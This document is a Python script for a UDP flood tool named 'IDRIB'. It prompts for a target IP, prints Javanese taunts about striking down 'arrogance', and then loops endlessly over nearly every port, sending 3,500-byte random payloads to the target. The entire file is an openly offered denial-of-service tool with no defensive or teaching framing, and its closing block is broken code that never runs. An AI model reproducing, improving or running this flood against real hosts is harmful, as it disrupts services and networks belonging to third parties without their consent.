# -*- coding: utf-8 -*-
import os
import socket
import random
import time
import fade

# Colors
class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    UNDERLINE = '\033[4m'
    PURPLE = '\033[97m'
    BOLD    = "\033[1m"
    BLACK   = "\033[30m"
    RED     = "\033[31m"
    GREEN   = "\033[32m"
    YELLOW  = "\033[33m"
    BLUE    = "\033[34m"
    MAGENTA = "\033[35m"
    CYAN    = "\033[36m"
    WHITE   = "\033[37m"
    os.system("clear")

########################
white = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(3500)
####################

os.system("clear")
logo = """
            ██▒▒        ██▒▒             ██▒▒
            ██▒▒        ██▒▒             ██▒▒
            ██▒▒  ██ ██▒██▒▒██▒ ███▒▒██▒▒██▒██▒██▒▒
            ██▒▒██▒▒    ██▒▒██ █▒▒   ██▒▒██▒▒    ██▒▒
            ██▒▒██▒▒    ██▒▒██▒▒     ██▒▒██▒▒    ██▒▒  
            ██▒▒  ██ ██▒██▒▒██▒▒     ██▒▒██▒██▒██▒▒
            ▒▒    ▒▒ ▒▒ ▒▒   ▒▒       ▒▒   ▒▒ ▒▒ ▒▒
            ▒      ▒  ▒  ▒  ▒        ▒     ▒  ▒  ▒
             ▒      ▒   ▒     ▒     ▒       ▒  ▒
\033[31m               ———————— IDRIB IS A BLOW ————————
\033[32m                  WHICH WILL DESTROY ARROGANCE
\033[33m                          Author: KF24
\033[35m                         kode_keras.com
_______________________________________________________________
\033[37m_______________________________________________________________
"""
faded_text = fade.fire(logo)
print(faded_text)
ip = input("[+] Target's IP : ")
time.sleep(5),
print("\033[94m            --⟩⟩ : IDRIB...!!! \033[0m "),
time.sleep(5),
print("\033[96m            --⟩⟩ : Iku fi'il amar \033[0m "),
time.sleep(5),
print("\033[92m            --⟩⟩ : Kang tegese  pukulah...!! \033[0m "),
time.sleep(5),
print("\033[33m            --⟩⟩ : Dadi sc iki kanggo nggebug arrogansi \033[0m "),
time.sleep(5),
print("\033[35m            --⟩⟩ : Kaum wedhus \033[0m "),
time.sleep(5),
print("\033[97m            --⟩⟩ : Sing seneng nglakoni sakarep udele \033[0m "),
time.sleep(5),
print("\033[33m            --⟩⟩ : Monggo mbakyu, Maseh dikawiti Serangane...\033[0m")
time.sleep(5)
while True:
    sent = 0
    for port in range(1, 65534):
        white.sendto(bytes, (ip, port))
        sent = sent + 1
        time.sleep(1)
        print("\033[94m[IDRIB] \033[97m%s  \033[31m[Ngirim ke]  \033[92m%s  \033[36mPort \033[33m%s " % (sent, ip, port))
    if():
        s.close
        print("\033[92mSerangan wes Rampung\033[0m")
